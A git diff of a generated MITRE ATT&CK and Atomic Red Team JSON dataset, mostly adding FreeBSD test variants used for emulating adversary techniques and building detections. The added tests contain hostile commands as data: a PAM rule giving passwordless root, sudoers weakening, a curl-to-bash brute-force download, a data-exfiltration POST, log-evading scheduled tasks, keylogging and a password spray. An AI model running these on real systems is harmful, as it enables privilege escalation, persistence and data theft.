diff --git a/data_collector/generated_attck_data_v3.json b/data_collector/generated_attck_data_v3.json index 56ca488..c930d4c 100644 --- a/data_collector/generated_attck_data_v3.json +++ b/data_collector/generated_attck_data_v3.json @@ -1,5 +1,5 @@ { - "id": "bundle--381df177-dc72-494c-be4a-83027c2ca348", + "id": "bundle--feb75802-6feb-4205-87dd-3d739c429ed4", "type": "bundle", "spec_version": "2.0", "objects": [ @@ -71500,8 +71500,8 @@ "id": "malware--edb24a93-1f7a-4bbf-a738-1397a14662c6", "name": "Astaroth", "created": "2019-04-17T13:46:38.565Z", - "modified": "2023-03-21T21:20:23.717Z", - "x_mitre_version": "2.1", + "modified": "2023-11-06T20:12:28.502Z", + "x_mitre_version": "2.2", "type": "malware", "labels": [ "malware" @@ -71615,7 +71615,7 @@ "notes": "", "socks_support": false, "x_mitre_old_attack_id": "", - "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_attack_spec_version": "3.2.0", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_domains": [ "enterprise-attack" @@ -87398,7 +87398,8 @@ "$xml = [System.IO.File]::ReadAllText(\"\\T1053.005\\src\\T1053_005_WMI.xml\")\nInvoke-CimMethod -ClassName PS_ScheduledTask -NameSpace \"Root\\Microsoft\\Windows\\TaskScheduler\" -MethodName \"RegisterByXml\" -Arguments @{ Force = $true; Xml =$xml; }\n", "reg add HKCU\\SOFTWARE\\ATOMIC-T1053.005 /v test /t REG_SZ /d cGluZyAxMjcuMC4wLjE= /f\nschtasks.exe /Create /F /TN \"ATOMIC-T1053.005\" /TR \"cmd /c start /min \\\"\\\" powershell.exe -Command IEX([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String((Get-ItemProperty -Path HKCU:\\\\SOFTWARE\\\\ATOMIC-T1053.005).test)))\" /sc daily /st 07:45\n", "$xml = [System.IO.File]::ReadAllText(\"\\T1053.005\\src\\T1053_05_SCTASK_HIDDEN_ATTRIB.xml\")\nInvoke-CimMethod -ClassName PS_ScheduledTask -NameSpace \"Root\\Microsoft\\Windows\\TaskScheduler\" -MethodName \"RegisterByXml\" -Arguments @{ Force = $true; Xml =$xml; }\n", - "$Action = New-ScheduledTaskAction -Execute \"cmd.exe\"\n$Trigger = New-ScheduledTaskTrigger -AtLogon\n$User = New-ScheduledTaskPrincipal -GroupId \"BUILTIN\\Administrators\" -RunLevel Highest\n$Set = New-ScheduledTaskSettingsSet\n$object = New-ScheduledTask -Action $Action -Principal $User -Trigger $Trigger -Settings $Set\nRegister-ScheduledTask AtomicTaskModifed -InputObject $object\n$NewAction = New-ScheduledTaskAction -Execute \"Notepad.exe\"\nSet-ScheduledTask \"AtomicTaskModifed\" -Action $NewAction\n" + "$Action = New-ScheduledTaskAction -Execute \"cmd.exe\"\n$Trigger = New-ScheduledTaskTrigger -AtLogon\n$User = New-ScheduledTaskPrincipal -GroupId \"BUILTIN\\Administrators\" -RunLevel Highest\n$Set = New-ScheduledTaskSettingsSet\n$object = New-ScheduledTask -Action $Action -Principal $User -Trigger $Trigger -Settings $Set\nRegister-ScheduledTask AtomicTaskModifed -InputObject $object\n$NewAction = New-ScheduledTaskAction -Execute \"Notepad.exe\"\nSet-ScheduledTask \"AtomicTaskModifed\" -Action $NewAction\n", + "\"\\..\\ExternalPayloads\\PsExec.exe\" \\\\localhost -accepteula -s \"cmd.exe\"\n\"\\..\\ExternalPayloads\\GhostTask.exe\" \\\\localhost add lilghostie \"cmd.exe\" \"/c notepad.exe\" $env:USERDOMAIN + '\\' + $env:USERNAME logon\n" ], "commands": [], "queries": [], @@ -87624,6 +87625,55 @@ "command": "$Action = New-ScheduledTaskAction -Execute \"cmd.exe\"\n$Trigger = New-ScheduledTaskTrigger -AtLogon\n$User = New-ScheduledTaskPrincipal -GroupId \"BUILTIN\\Administrators\" -RunLevel Highest\n$Set = New-ScheduledTaskSettingsSet\n$object = New-ScheduledTask -Action $Action -Principal $User -Trigger $Trigger -Settings $Set\nRegister-ScheduledTask AtomicTaskModifed -InputObject $object\n$NewAction = New-ScheduledTaskAction -Execute \"Notepad.exe\"\nSet-ScheduledTask \"AtomicTaskModifed\" -Action $NewAction\n", "cleanup_command": "Unregister-ScheduledTask -TaskName \"AtomicTaskModifed\" -confirm:$false >$null 2>&1\n" } + }, + { + "name": "Scheduled Task (\"Ghost Task\") via Registry Key Manipulation", + "auto_generated_guid": "704333ca-cc12-4bcf-9916-101844881f54", + "description": "Create a scheduled task through manipulation of registry keys. This procedure is implemented using the [GhostTask](https://github.com/netero1010/GhostTask) utility. By manipulating registry keys under HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tree, the tool creates user-specified scheduled tasks without a corresponding Windows Event 4698, which is logged when scheduled tasks are created through conventional means.\nThis requires a download of the GhostTask binary, which must be run as NT Authority\\SYSTEM. Upon successful execution of this test, a scheduled task will be set to run at logon which launches notepad.exe or runs a user-specified command.\nFor further exploration of this procedure and guidance for hunting and detection, see [Hunting G-G-G-GhostTasks!](https://medium.com/p/154b50ab6a78).\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "task_name": { + "description": "Name of the newly-added task", + "type": "string", + "default": "lilghostie" + }, + "task_command": { + "description": "Command you want the task to execute", + "type": "string", + "default": "notepad.exe" + }, + "target": { + "description": "System where the task should run", + "type": "string", + "default": "localhost" + }, + "user_name": { + "description": "Username to authenticate with, such as ATOMICDOMAIN\\AtomicAdmin", + "type": "string", + "default": "$env:USERDOMAIN + '\\' + $env:USERNAME" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "PsExec tool from Sysinternals must exist in the ExternalPayloads directory\n", + "prereq_command": "if (Test-Path \"PathToAtomicsFolder\\..\\ExternalPayloads\\PsExec.exe\") { exit 0} else { exit 1}\n", + "get_prereq_command": "New-Item -Type Directory \"PathToAtomicsFolder\\..\\ExternalPayloads\\\" -ErrorAction Ignore -Force | Out-Null\nInvoke-WebRequest \"https://download.sysinternals.com/files/PSTools.zip\" -OutFile \"PathToAtomicsFolder\\..\\ExternalPayloads\\PsTools.zip\"\nExpand-Archive \"PathToAtomicsFolder\\..\\ExternalPayloads\\PsTools.zip\" \"PathToAtomicsFolder\\..\\ExternalPayloads\\PsTools\" -Force\nCopy-Item \"PathToAtomicsFolder\\..\\ExternalPayloads\\PsTools\\PsExec.exe\" \"PathToAtomicsFolder\\..\\ExternalPayloads\\PsExec.exe\" -Force\n" + }, + { + "description": "GhostTask.exe tool from netero101 must exist in the ExternalPayloads directory. This tool may be quarantined by windows defender; disable windows defender real-time protection to fix it or add the ExternalPayloads directory as an exclusion, using a command like `Add-MpPreference -ExclusionPath \"PathToAtomicsFolder\\..\\ExternalPayloads\\\"`\n", + "prereq_command": "if (Test-Path \"PathToAtomicsFolder\\..\\ExternalPayloads\\GhostTask.exe\") { exit 0} else { exit 1}\n", + "get_prereq_command": "New-Item -Type Directory \"PathToAtomicsFolder\\..\\ExternalPayloads\\\" -ErrorAction Ignore -Force | Out-Null\nInvoke-WebRequest \"https://github.com/netero1010/GhostTask/releases/download/1.0/GhostTask.exe\" -OutFile \"PathToAtomicsFolder\\..\\ExternalPayloads\\GhostTask.exe\"\n" + } + ], + "executor": { + "name": "command_prompt", + "elevation_required": true, + "command": "\"PathToAtomicsFolder\\..\\ExternalPayloads\\PsExec.exe\" \\\\#{target} -accepteula -s \"cmd.exe\"\n\"PathToAtomicsFolder\\..\\ExternalPayloads\\GhostTask.exe\" \\\\#{target} add #{task_name} \"cmd.exe\" \"/c #{task_command}\" #{user_name} logon\n", + "cleanup_command": "\"PathToAtomicsFolder\\..\\ExternalPayloads\\PsExec.exe\" \\\\#{target} -accepteula -s \"cmd.exe\"\n\"PathToAtomicsFolder\\..\\ExternalPayloads\\GhostTask.exe\" \\\\#{target} delete #{task_name} > nul" + } } ] } @@ -91170,8 +91220,8 @@ "auto_generated_guid": "0286eb44-e7ce-41a0-b109-3da516e05a5f", "description": "Encrypt data for exiltration\n", "supported_platforms": [ - "macos", - "linux" + "linux", + "macos" ], "input_arguments": { "test_folder": { @@ -91195,7 +91245,7 @@ { "description": "gpg and zip are required to run the test.", "prereq_command": "if [ ! -x \"$(command -v gpg)\" ] || [ ! -x \"$(command -v zip)\" ]; then exit 1; fi;\n", - "get_prereq_command": "(which yum && yum -y install epel-release zip gpg)||(which apt-get && apt-get install -y zip gpg)\n" + "get_prereq_command": "(which pkg && pkg install -y gnupg zip)||(which yum && yum -y install epel-release zip gpg)||(which apt-get && apt-get install -y zip gpg)\n" } ], "executor": { @@ -98421,6 +98471,8 @@ "screencapture /tmp/T1113_desktop.png\n", "screencapture -x /tmp/T1113_desktop.png\n", "xwd -root -out /tmp/T1113_desktop.xwd\nxwud -in /tmp/T1113_desktop.xwd\n", + "xwd -root -out /tmp/T1113_desktop.xwd\nxwud -in /tmp/T1113_desktop.xwd\n", + "import -window root /tmp/T1113_desktop.png\n", "import -window root /tmp/T1113_desktop.png\n", "cmd /c start /b psr.exe /start /output c:\\temp\\T1113_desktop.zip /sc 1 /gui 0 /stopevent 12\nAdd-Type -MemberDefinition '[DllImport(\"user32.dll\")] public static extern void mouse_event(int flags, int dx, int dy, int cButtons, int info);' -Name U32 -Namespace W;\n[W.U32]::mouse_event(0x02 -bor 0x04 -bor 0x01, 0, 0, 0, 0);\ncmd /c \"timeout 5 > NULL && psr.exe /stop\"\n", "Add-Type -AssemblyName System.Windows.Forms\n$screen = [Windows.Forms.SystemInformation]::VirtualScreen\n$bitmap = New-Object Drawing.Bitmap $screen.Width, $screen.Height\n$graphic = [Drawing.Graphics]::FromImage($bitmap)\n$graphic.CopyFromScreen($screen.Left, $screen.Top, 0, 0, $bitmap.Size)\n$bitmap.Save(\"$env:TEMP\\T1113.png\")\n", @@ -98519,6 +98571,34 @@ "name": "bash" } }, + { + "name": "X Windows Capture (freebsd)", + "auto_generated_guid": "562f3bc2-74e8-46c5-95c7-0e01f9ccc65c", + "description": "Use xwd command to collect a full desktop screenshot and review file with xwud\n", + "supported_platforms": [ + "linux" + ], + "input_arguments": { + "output_file": { + "description": "Output file path", + "type": "path", + "default": "/tmp/T1113_desktop.xwd" + } + }, + "dependency_executor_name": "sh", + "dependencies": [ + { + "description": "Package with XWD and XWUD must exist on device\n", + "prereq_command": "if [ -x \"$(command -v xwd)\" ]; then exit 0; else exit 1; fi\nif [ -x \"$(command -v xwud)\" ]; then exit 0; else exit 1; fi\n", + "get_prereq_command": "pkg install -y xwd xwud \n" + } + ], + "executor": { + "command": "xwd -root -out #{output_file}\nxwud -in #{output_file}\n", + "cleanup_command": "rm #{output_file}\n", + "name": "sh" + } + }, { "name": "Capture Linux Desktop using Import Tool", "auto_generated_guid": "9cd1cccb-91e4-4550-9139-e20a586fcea1", @@ -98546,6 +98626,33 @@ "name": "bash" } }, + { + "name": "Capture Linux Desktop using Import Tool (freebsd)", + "auto_generated_guid": "18397d87-38aa-4443-a098-8a48a8ca5d8d", + "description": "Use import command from ImageMagick to collect a full desktop screenshot\n", + "supported_platforms": [ + "linux" + ], + "input_arguments": { + "output_file": { + "description": "Output file path", + "type": "path", + "default": "/tmp/T1113_desktop.png" + } + }, + "dependencies": [ + { + "description": "ImageMagick must be installed\n", + "prereq_command": "if import -help > /dev/null 2>&1; then exit 0; else exit 1; fi\n", + "get_prereq_command": "pkg install -y ImageMagick7\n" + } + ], + "executor": { + "command": "import -window root #{output_file}\n", + "cleanup_command": "rm #{output_file}\n", + "name": "sh" + } + }, { "name": "Windows Screencapture", "auto_generated_guid": "3c898f62-626c-47d5-aad2-6de873d69153", @@ -106407,6 +106514,7 @@ ], "command_list": [ "echo -n 111-11-1111 | base64\ncurl -XPOST MTExLTExLTExMTE=.redcanary.com\n", + "echo -n 111-11-1111 | b64encode -r -\ncurl -XPOST MTExLTExLTExMTE=.redcanary.com\n", "Path\\n----\\nC:\\Users\\victim = ([system.Text.Encoding]::UTF8.getBytes(\"Path\\n----\\nC:\\Users\\victim\"))\nabcdefghijklmnopqrstuvwxyz123456 = \"abcdefghijklmnopqrstuvwxyz123456\"\n$cyphertext = @();\nfor ($i = 0; $i -lt Path\\n----\\nC:\\Users\\victim.Count; $i++) {\n $cyphertext += Path\\n----\\nC:\\Users\\victim[$i] -bxor abcdefghijklmnopqrstuvwxyz123456[$i % abcdefghijklmnopqrstuvwxyz123456.Length];\n}\n$cyphertext = [system.Text.Encoding]::UTF8.getString($cyphertext)\n[System.Net.ServicePointManager]::Expect100Continue = $false\nInvoke-WebRequest -Uri example.com -Method POST -Body $cyphertext -DisableKeepAlive\n" ], "commands": [], @@ -106444,6 +106552,38 @@ "name": "sh" } }, + { + "name": "Base64 Encoded data (freebsd)", + "auto_generated_guid": "2d97c626-7652-449e-a986-b02d9051c298", + "description": "Utilizing a common technique for posting base64 encoded data.\n", + "supported_platforms": [ + "linux" + ], + "input_arguments": { + "destination_url": { + "description": "Destination URL to post encoded data.", + "type": "url", + "default": "redcanary.com" + }, + "base64_data": { + "description": "Encoded data to post using fake Social Security number 111-11-1111.", + "type": "string", + "default": "MTExLTExLTExMTE=" + } + }, + "dependency_executor_name": "sh", + "dependencies": [ + { + "description": "Requires curl\n", + "prereq_command": "if [ -x \"$(command -v curl)\" ]; then exit 0; else exit 1; fi; \n", + "get_prereq_command": "pkg install -y curl\n" + } + ], + "executor": { + "command": "echo -n 111-11-1111 | b64encode -r -\ncurl -XPOST #{base64_data}.#{destination_url}\n", + "name": "sh" + } + }, { "name": "XOR Encoded data.", "auto_generated_guid": "c3ed6d2a-e3ad-400d-ad78-bbfdbfeacc08", @@ -107043,6 +107183,7 @@ ], "command_list": [ "sudo sed -i \"1s,^,auth sufficient pam_succeed_if.so uid >= 0\\n,g\" /etc/pam.d/su-l\n", + "sudo sed -i \"\" \"8s,^,auth sufficient pam_succeed_if.so uid >= 0\\n,g\" /etc/pam.d/su\n", "sudo sed -i \"1s,^,auth sufficient /tmp/pam_evil.so\\n,g\" /etc/pam.d/su-l\n" ], "commands": [], @@ -107086,6 +107227,37 @@ "cleanup_command": "sudo sed -i \"\\,#{pam_rule},d\" #{path_to_pam_conf}\n" } }, + { + "name": "Malicious PAM rule (freebsd)", + "auto_generated_guid": "b17eacac-282d-4ca8-a240-46602cf863e3", + "description": "Inserts a rule into a PAM config and then tests it.\n\nUpon successful execution, this test will insert a rule that allows every user to su to root without a password.\n", + "supported_platforms": [ + "linux" + ], + "input_arguments": { + "path_to_pam_conf": { + "description": "PAM config file to modify.", + "type": "string", + "default": "/etc/pam.d/su" + }, + "pam_rule": { + "description": "Rule to add to the PAM config.", + "type": "string", + "default": "auth sufficient pam_succeed_if.so uid >= 0" + }, + "index": { + "description": "Index where the rule is inserted.", + "type": "integer", + "default": 8 + } + }, + "executor": { + "name": "sh", + "elevation_required": true, + "command": "sudo sed -i \"\" \"#{index}s,^,#{pam_rule}\\n,g\" #{path_to_pam_conf}\n", + "cleanup_command": "sudo sed -i \"\" \"/#{pam_rule}/d\" #{path_to_pam_conf}\n" + } + }, { "name": "Malicious PAM module", "auto_generated_guid": "65208808-3125-4a2e-8389-a0a00e9ab326", @@ -108523,6 +108695,7 @@ "&\"\\T1056.001\\src\\Get-Keystrokes.ps1\" -LogPath $env:TEMP\\key.log\n", "if sudo test -f /etc/pam.d/password-auth; then sudo cp /etc/pam.d/password-auth /tmp/password-auth.bk; fi;\nif sudo test -f /etc/pam.d/system-auth; then sudo cp /etc/pam.d/system-auth /tmp/system-auth.bk; fi;\nsudo touch /tmp/password-auth.bk\nsudo touch /tmp/system-auth.bk sudo echo \"session required pam_tty_audit.so\nenable=* log_password\" >> /etc/pam.d/password-auth sudo echo \"session required pam_tty_audit.so\nenable=* log_password\" >> /etc/pam.d/system-auth\n", "PROMPT_COMMAND='history -a >(tee -a ~/.bash_history |logger -t \"$USER[$$] $SSH_CONNECTION \")'\necho \"\\$PROMPT_COMMAND=$PROMPT_COMMAND\"\ntail /var/log/syslog\n", + "PS2=`logger -t \"$USER\" -f ~/.sh_history`\n$PS2\ntail /var/log/messages\n", "trap 'echo \"$(date +\"%d/%m/%y %H:%M:%S.%s\") $USER $BASH_COMMAND\" >> /tmp/.keyboard.log' DEBUG\necho \"Hello World!\"\ncat /tmp/.keyboard.log\n", "cp -v /etc/pam.d/sshd /tmp/\necho \"session required pam_tty_audit.so disable=* enable=* open_only log_passwd\" >> /etc/pam.d/sshd\nsystemctl restart sshd\nsystemctl restart auditd\nssh ubuntu@localhost \nwhoami\nsudo su\nwhoami\nexit\nexit\n", "auditctl -a always,exit -F arch=b64 -S execve -k CMDS \nauditctl -a always,exit -F arch=b32 -S execve -k CMDS\nwhoami; ausearch -i --start $(date +\"%d/%m/%y %H:%M:%S\") \n", @@ -108609,6 +108782,28 @@ "cleanup_command": "unset PROMPT_COMMAND\n" } }, + { + "name": "Logging sh history to syslog/messages", + "auto_generated_guid": "b04284dc-3bd9-4840-8d21-61b8d31c99f2", + "description": "There are several variables that can be set to control the appearance of the bash command prompt: PS1, PS2, PS3, PS4 and PROMPT_COMMAND. The contents of these variables are executed as if they had been typed on the command line. The PROMPT_COMMAND variable \"if set\" will be executed before the PS1 variable and can be configured to write the latest \"bash history\" entries to the syslog.\n\nTo gain persistence the command could be added to the users .shrc or .profile \n", + "supported_platforms": [ + "linux" + ], + "dependency_executor_name": "sh", + "dependencies": [ + { + "description": "This test requires to be run in a bash shell and that logger and tee are installed.\n", + "prereq_command": "if [ \"$(echo $SHELL)\" != \"/bin/sh\" ]; then echo -e \"\\n***** sh not running! *****\\n\"; exit 1; fi\nif [ ! -x \"$(command -v logger)\" ]; then echo -e \"\\n***** logger NOT installed *****\\n\"; exit 1; fi\n", + "get_prereq_command": "echo \"\"\n" + } + ], + "executor": { + "name": "sh", + "elevation_required": true, + "command": "PS2=`logger -t \"$USER\" -f ~/.sh_history`\n$PS2\ntail /var/log/messages\n", + "cleanup_command": "unset PS2\n" + } + }, { "name": "Bash session based keylogger", "auto_generated_guid": "7f85a946-a0ea-48aa-b6ac-8ff539278258", @@ -108620,7 +108815,7 @@ "dependencies": [ { "description": "This test requires to be run in a bash shell\n", - "prereq_command": "if [ \"$(echo $SHELL)\" != \"/bin/bash\" ]; then echo -e \"\\n***** Bash not running! *****\\n\"; exit 1; fi\n", + "prereq_command": "if [ \"$(echo $0)\" != \"bash\" ]; then echo -e \"\\n***** Bash not running! *****\\n\"; exit 1; fi\n", "get_prereq_command": "echo \"\"\n" } ], @@ -108633,7 +108828,7 @@ } }, "executor": { - "name": "sh", + "name": "bash", "elevation_required": false, "command": "trap 'echo \"$(date +\"%d/%m/%y %H:%M:%S.%s\") $USER $BASH_COMMAND\" >> #{output_file}' DEBUG\necho \"Hello World!\"\ncat #{output_file}\n", "cleanup_command": "rm #{output_file}\n" @@ -109094,26 +109289,29 @@ "chown root /tmp/AtomicRedTeam/atomics/T1222.002/T1222.002.yaml\n", "chown -R root /tmp/AtomicRedTeam/atomics/T1222.002\n", "chattr -i /var/spool/cron/root\n", + "touch /tmp/T1222.002.txt\nchflags simmutable /tmp/T1222.002.txt\nchflags nosimmutable /tmp/T1222.002.txt\n", "/tmp/T1222002 /tmp/ T1222002\n", - "sudo /tmp/T1222002own /T1222.002/src/chown.c\n" + "/tmp/T1222002 /tmp/ T1222002\n", + "sudo /tmp/T1222002own /T1222.002/src/chown.c\n", + "/tmp/T1222002own /T1222.002/src/chown.c\n" ], "commands": [], "queries": [], "parsed_datasets": [ { "source": "atomics/T1222.002/T1222.002.yaml", - "name": "Atomic Red Team Test - File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification", + "name": "Atomic Red Team Test - File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification", "content": { "attack_technique": "T1222.002", - "display_name": "File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification", + "display_name": "File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification", "atomic_tests": [ { "name": "chmod - Change file or folder mode (numeric mode)", "auto_generated_guid": "34ca1464-de9d-40c6-8c77-690adf36a135", "description": "Changes a file or folder's permissions using chmod and a specified numeric mode.\n", "supported_platforms": [ - "macos", - "linux" + "linux", + "macos" ], "input_arguments": { "numeric_mode": { @@ -109129,7 +109327,7 @@ }, "executor": { "command": "chmod #{numeric_mode} #{file_or_folder}\n", - "name": "bash" + "name": "sh" } }, { @@ -109137,8 +109335,8 @@ "auto_generated_guid": "fc9d6695-d022-4a80-91b1-381f5c35aff3", "description": "Changes a file or folder's permissions using chmod and a specified symbolic mode.\n", "supported_platforms": [ - "macos", - "linux" + "linux", + "macos" ], "input_arguments": { "symbolic_mode": { @@ -109154,7 +109352,7 @@ }, "executor": { "command": "chmod #{symbolic_mode} #{file_or_folder}\n", - "name": "bash" + "name": "sh" } }, { @@ -109162,8 +109360,8 @@ "auto_generated_guid": "ea79f937-4a4d-4348-ace6-9916aec453a4", "description": "Changes a file or folder's permissions recursively using chmod and a specified numeric mode.\n", "supported_platforms": [ - "macos", - "linux" + "linux", + "macos" ], "input_arguments": { "numeric_mode": { @@ -109179,7 +109377,7 @@ }, "executor": { "command": "chmod -R #{numeric_mode} #{file_or_folder}\n", - "name": "bash" + "name": "sh" } }, { @@ -109187,8 +109385,8 @@ "auto_generated_guid": "0451125c-b5f6-488f-993b-5a32b09f7d8f", "description": "Changes a file or folder's permissions recursively using chmod and a specified symbolic mode.\n", "supported_platforms": [ - "macos", - "linux" + "linux", + "macos" ], "input_arguments": { "symbolic_mode": { @@ -109272,8 +109470,8 @@ "auto_generated_guid": "967ba79d-f184-4e0e-8d09-6362b3162e99", "description": "Changes a file or folder's ownership only using chown.\n", "supported_platforms": [ - "macos", - "linux" + "linux", + "macos" ], "input_arguments": { "owner": { @@ -109289,7 +109487,7 @@ }, "executor": { "command": "chown #{owner} #{file_or_folder}\n", - "name": "bash" + "name": "sh" } }, { @@ -109337,6 +109535,25 @@ "name": "sh" } }, + { + "name": "chflags - Remove immutable file attribute", + "auto_generated_guid": "60eee3ea-2ebd-453b-a666-c52ce08d2709", + "description": "Remove's a file's `immutable` attribute using `chflags`.\nThis technique was used by the threat actor Rocke during the compromise of Linux web servers.\n", + "supported_platforms": [ + "linux" + ], + "input_arguments": { + "file_to_modify": { + "description": "Path of the file", + "type": "path", + "default": "/tmp/T1222.002.txt" + } + }, + "executor": { + "command": "touch #{file_to_modify}\nchflags simmutable #{file_to_modify}\nchflags nosimmutable #{file_to_modify}\n", + "name": "sh" + } + }, { "name": "Chmod through c script", "auto_generated_guid": "973631cf-6680-4ffa-a053-045e1b6b67ab", @@ -109370,6 +109587,38 @@ "name": "sh" } }, + { + "name": "Chmod through c script (freebsd)", + "auto_generated_guid": "da40b5fe-3098-4b3b-a410-ff177e49ee2e", + "description": "chmods a file using a c script\n", + "supported_platforms": [ + "linux" + ], + "input_arguments": { + "source_file": { + "description": "Path of c source file", + "type": "path", + "default": "PathToAtomicsFolder/T1222.002/src/T1222.002.c" + }, + "compiled_file": { + "description": "Path of compiled file", + "type": "path", + "default": "/tmp/T1222002" + } + }, + "dependency_executor_name": "sh", + "dependencies": [ + { + "description": "Compile the script from (#{source_file}). Destination is #{compiled_file}\n", + "prereq_command": "cc #{source_file} -o #{compiled_file}\n", + "get_prereq_command": "cc #{source_file} -o #{compiled_file}\n" + } + ], + "executor": { + "command": "#{compiled_file} /tmp/ T1222002\n", + "name": "sh" + } + }, { "name": "Chown through c script", "auto_generated_guid": "18592ba1-5f88-4e3c-abc8-ab1c6042e389", @@ -109403,6 +109652,39 @@ "name": "sh", "elevation_required": true } + }, + { + "name": "Chown through c script (freebsd)", + "auto_generated_guid": "eb577a19-b730-4918-9b03-c5edcf51dc4e", + "description": "chowns a file to root using a c script\n", + "supported_platforms": [ + "linux" + ], + "input_arguments": { + "source_file": { + "description": "Path of c source file", + "type": "path", + "default": "PathToAtomicsFolder/T1222.002/src/chown.c" + }, + "compiled_file": { + "description": "Path of compiled file", + "type": "path", + "default": "/tmp/T1222002own" + } + }, + "dependency_executor_name": "sh", + "dependencies": [ + { + "description": "Compile the script from (#{source_file}). Destination is #{compiled_file}\n", + "prereq_command": "cc #{source_file} -o #{compiled_file}\n", + "get_prereq_command": "cc #{source_file} -o #{compiled_file}\n" + } + ], + "executor": { + "command": "#{compiled_file} #{source_file}\n", + "name": "sh", + "elevation_required": true + } } ] } @@ -109901,7 +110183,8 @@ "Import-Module -Name AzureAD\n\nPassword1`n1q2w3e4r`nPassword! = \"Password1`n1q2w3e4r`nPassword!\".split(\"{`n}\")\nforeach($password in Password1`n1q2w3e4r`nPassword!) {\n $PWord = ConvertTo-SecureString -String \"$password\" -AsPlainText -Force\n $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList \"bruce.wayne@contoso.com\", $Pword\n try {\n Write-Host \" [-] Attempting ${password} on account bruce.wayne@contoso.com.\"\n Connect-AzureAD -Credential $Credential 2>&1> $null\n # if credentials aren't correct, it will break just above and goes into catch block, so if we're here we can display success\n Write-Host \" [!] bruce.wayne@contoso.com:${password} are valid credentials!`r`n\"\n break\n } catch {\n Write-Host \" [-] bruce.wayne@contoso.com:${password} invalid credentials.`r`n\"\n }\n}\nWrite-Host \"End of bruteforce\"\n", "cd \"\\..\\ExternalPayloads\"\n.\\kerbrute.exe bruteuser --dc $ENV:userdnsdomain -d $ENV:userdomain $env:temp\\bruteuser.txt TestUser1 \n", "useradd -G sudo -s /bin/bash -p $(openssl passwd -1 password123) art\nsu art\ncd /tmp\ncurl -s https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1110.001/src/sudo_bruteforce.sh |bash\n", - "useradd -G wheel -s /bin/bash -p $(openssl passwd -1 password123) art\nsu art\ncd /tmp\ncurl -s https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1110.001/src/sudo_bruteforce.sh |bash\n" + "useradd -G wheel -s /bin/bash -p $(openssl passwd -1 password123) art\nsu art\ncd /tmp\ncurl -s https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1110.001/src/sudo_bruteforce.sh |bash\n", + "pw adduser art -g wheel -s /bin/sh\necho \"password123\" | pw usermod art -h 0\nsu art\ncd /tmp\ncurl -s https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1110.001/src/sudo_bruteforce.sh |bash\n" ], "commands": [], "queries": [], @@ -110095,6 +110378,35 @@ "command": "useradd -G wheel -s /bin/bash -p $(openssl passwd -1 password123) art\nsu art\ncd /tmp\ncurl -s #{remote_url} |bash\n", "cleanup_command": "userdel -fr art\n" } + }, + { + "name": "SUDO Brute Force - FreeBSD", + "auto_generated_guid": "abcde488-e083-4ee7-bc85-a5684edd7541", + "description": "An adversary may find themselves on a box (e.g. via ssh key auth, with no password) with a user that has sudo'ers privileges, but they do not know the users password. Normally, failed attempts to access root will not cause the root account to become locked, to prevent denial-of-service. This functionality enables an attacker to undertake a local brute force password guessing attack without locking out the root user. \n\nThis test creates the \"art\" user with a password of \"password123\", logs in, downloads and executes the sudo_bruteforce.sh which brute force guesses the password, then deletes the user\n", + "supported_platforms": [ + "linux" + ], + "input_arguments": { + "remote_url": { + "description": "url of remote payload", + "type": "url", + "default": "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1110.001/src/sudo_bruteforce.sh" + } + }, + "dependency_executor_name": "sh", + "dependencies": [ + { + "description": "Check if running on a FreeBSD based machine.\n", + "prereq_command": "if grep -iq \"FreeBSD\" /etc/os-release; then echo \"FreeBSD\"; else echo \"NOT FreeBSD\"; exit 1; fi\nif [ -x \"$(command -v openssl)\" ]; then echo \"openssl is installed\"; else echo \"openssl is NOT installed\"; exit 1; fi\nif [ -x \"$(command -v sudo)\" ]; then echo \"sudo is installed\"; else echo \"sudo is NOT installed\"; exit 1; fi\nif [ -x \"$(command -v curl)\" ]; then echo \"curl is installed\"; else echo \"curl is NOT installed\"; exit 1; fi\nif [ -x \"$(command -v bash)\" ]; then echo \"bash is installed\"; else echo \"bash is NOT installed\"; exit 1; fi\n", + "get_prereq_command": "pkg update && pkg install -y sudo curl bash\n" + } + ], + "executor": { + "name": "bash", + "elevation_required": true, + "command": "pw adduser art -g wheel -s /bin/sh\necho \"password123\" | pw usermod art -h 0\nsu art\ncd /tmp\ncurl -s #{remote_url} |bash\n", + "cleanup_command": "rmuser -y art\n" + } } ] } @@ -141131,8 +141443,11 @@ ], "command_list": [ "sudo -l \nsudo cat /etc/sudoers\nsudo vim /etc/sudoers\n", + "sudo -l \nsudo cat /usr/local/etc/sudoers\nsudo ee /usr/local/etc/sudoers\n", "sudo sed -i 's/env_reset.*$/env_reset,timestamp_timeout=-1/' /etc/sudoers\nsudo visudo -c -f /etc/sudoers\n", - "sudo sh -c \"echo Defaults \"'!'\"tty_tickets >> /etc/sudoers\"\nsudo visudo -c -f /etc/sudoers" + "sudo sed -i 's/env_reset.*$/env_reset,timestamp_timeout=-1/' /usr/local/etc/sudoers\nsudo visudo -c -f /usr/local/etc/sudoers\n", + "sudo sh -c \"echo Defaults \"'!'\"tty_tickets >> /etc/sudoers\"\nsudo visudo -c -f /etc/sudoers\n", + "sudo sh -c \"echo Defaults \"'!'\"tty_tickets >> /usr/local/etc/sudoers\"\nsudo visudo -c -f /usr/local/etc/sudoers\n" ], "commands": [], "queries": [], @@ -141158,6 +141473,27 @@ "command": "sudo -l \nsudo cat /etc/sudoers\nsudo vim /etc/sudoers\n" } }, + { + "name": "Sudo usage (freebsd)", + "auto_generated_guid": "2bf9a018-4664-438a-b435-cc6f8c6f71b1", + "description": "Common Sudo enumeration methods.\n", + "supported_platforms": [ + 